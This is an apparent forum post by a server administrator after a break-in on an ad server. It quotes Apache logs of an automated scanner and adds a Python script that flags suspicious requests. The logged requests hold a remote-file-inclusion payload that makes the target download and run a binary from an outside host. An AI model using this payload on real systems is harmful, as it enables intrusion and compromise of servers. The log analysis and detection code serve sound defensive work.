I recently had to rebuild a box after being hacked. I believe the exploit was run through phpAdsNew, which has since been updated. I've made it a little more difficult to find this time, BUT I noticed the server was SLOW to respond tonight. So I'm looking through log files. I am seeing the search for phpAdsNew files again... as well as others. This searching slowed the server down before.
How can I block access to this IP virtual host account from IPs that do not have reverse DNS lookup results, like the ISPs do for emails sent from boxes that don't resolve?
Since this is my ad server, and very few people need to access it by domain, can I set which port is allowed to listen for this domain in my site Apache conf file? Then I could access it with the port # I assign in the URL?
Code:
mybox:~ # nslookup 211.144.142.150
Server: 216.127.136.200
Address: 216.127.136.200#53
** server can't find 150.142.144.211.in-addr.arpa: NXDOMAIN
mybox:~ # grep 211.144.142.150 /var/log/apache2/ads-access_log
211.144.142.150 - - [17/Jul/2006:10:01:16 -0400] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 1057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:16 -0400] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 1057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:16 -0400] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 1057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:16 -0400] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 1057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:16 -0400] "GET /articles/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 1057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:17 -0400] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 1057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:19 -0400] "POST /xmlrpc.php HTTP/1.1" 404 1057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:20 -0400] "POST /blog/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:21 -0400] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:23 -0400] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:24 -0400] "POST /drupal/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:25 -0400] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:26 -0400] "POST /wordpress/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:28 -0400] "POST /xmlrpc.php HTTP/1.1" 404 1057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:29 -0400] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:34 -0400] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
mybox:~ # grep 211.144.142.150 /var/log/apache2/ads-error_log
[Mon Jul 17 10:01:16 2006] [error] [client 211.144.142.150] script '/srv/www/vhosts/ads/html/index2.php' not found or unable to stat
[Mon Jul 17 10:01:16 2006] [error] [client 211.144.142.150] script '/srv/www/vhosts/ads/html/index.php' not found or unable to stat
[Mon Jul 17 10:01:16 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/mambo
[Mon Jul 17 10:01:16 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/cvs
[Mon Jul 17 10:01:16 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/articles
[Mon Jul 17 10:01:17 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/cvs
[Mon Jul 17 10:01:19 2006] [error] [client 211.144.142.150] script '/srv/www/vhosts/ads/html/xmlrpc.php' not found or unable to stat
[Mon Jul 17 10:01:21 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/blog
[Mon Jul 17 10:01:22 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/blog
[Mon Jul 17 10:01:24 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/blogs
[Mon Jul 17 10:01:25 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/drupal
[Mon Jul 17 10:01:26 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/phpgroupware
[Mon Jul 17 10:01:27 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/wordpress
[Mon Jul 17 10:01:28 2006] [error] [client 211.144.142.150] script '/srv/www/vhosts/ads/html/xmlrpc.php' not found or unable to stat
[Mon Jul 17 10:01:30 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/xmlrpc
[Mon Jul 17 10:01:35 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/xmlsrv
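One way to turn the manual grep above into a repeatable check, written here as an added example and not code from the original post: it parses Apache combined-format access-log lines like the ones quoted, and reports any source IP that sends remote-file-inclusion style query strings (a URL stuffed into mosConfig_absolute_path), blindly POSTs to xmlrpc.php paths, or piles up 4xx responses. The lines and IPs in SAMPLE_LOG are constructed for the example and use documentation address ranges.

```python
import re
from collections import defaultdict

# Apache "combined" log format, as used by the ads-access_log in the post.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators taken from the probe pattern in the post: a remote URL passed in the
# Mambo/Joomla mosConfig_absolute_path parameter, and POSTs to xmlrpc.php paths.
RFI_PARAM = re.compile(r'[?&]mosConfig_absolute_path=https?://', re.I)
XMLRPC_PATH = re.compile(r'/xmlrpc\.php$', re.I)

# Constructed sample lines (not the post's own log); IPs are from RFC 5737 ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Jul/2006:10:01:16 -0400] "GET /mambo/index2.php?_REQUEST[option]=com_content&GLOBALS=&mosConfig_absolute_path=http://203.0.113.5/x.txt? HTTP/1.1" 404 1057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    '192.0.2.10 - - [17/Jul/2006:10:01:19 -0400] "POST /xmlrpc.php HTTP/1.1" 404 1057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    '192.0.2.10 - - [17/Jul/2006:10:01:20 -0400] "POST /blog/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    '198.51.100.7 - - [17/Jul/2006:10:02:01 -0400] "GET /adview.php?what=zone:1 HTTP/1.1" 200 512 "http://example.test/" "Mozilla/5.0"',
]

def parse_line(line):
    """Return the fields of one access-log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def flag_request(req):
    """List the reasons a single parsed request looks like an automated probe."""
    reasons = []
    if RFI_PARAM.search(req["path"]):
        reasons.append("rfi-param")
    if req["method"] == "POST" and XMLRPC_PATH.search(req["path"].split("?")[0]):
        reasons.append("xmlrpc-probe")
    return reasons

def summarize(lines, error_burst=5):
    """Per source IP: request count, 4xx count and probe reasons; keep only suspects."""
    per_ip = defaultdict(lambda: {"requests": 0, "errors": 0, "reasons": set()})
    for line in lines:
        req = parse_line(line)
        if req is None:
            continue  # skip malformed lines rather than abort the whole run
        stats = per_ip[req["ip"]]
        stats["requests"] += 1
        if req["status"].startswith("4"):
            stats["errors"] += 1
        stats["reasons"].update(flag_request(req))
    return {ip: s for ip, s in per_ip.items() if s["reasons"] or s["errors"] >= error_burst}

if __name__ == "__main__":
    for ip, s in summarize(SAMPLE_LOG).items():
        print(ip, s["requests"], "requests,", s["errors"], "4xx,", sorted(s["reasons"]))
```

Feed it the real log with `summarize(open("/var/log/apache2/ads-access_log"))` to get a candidate list for a firewall or Apache deny rule, rather than grepping one address at a time.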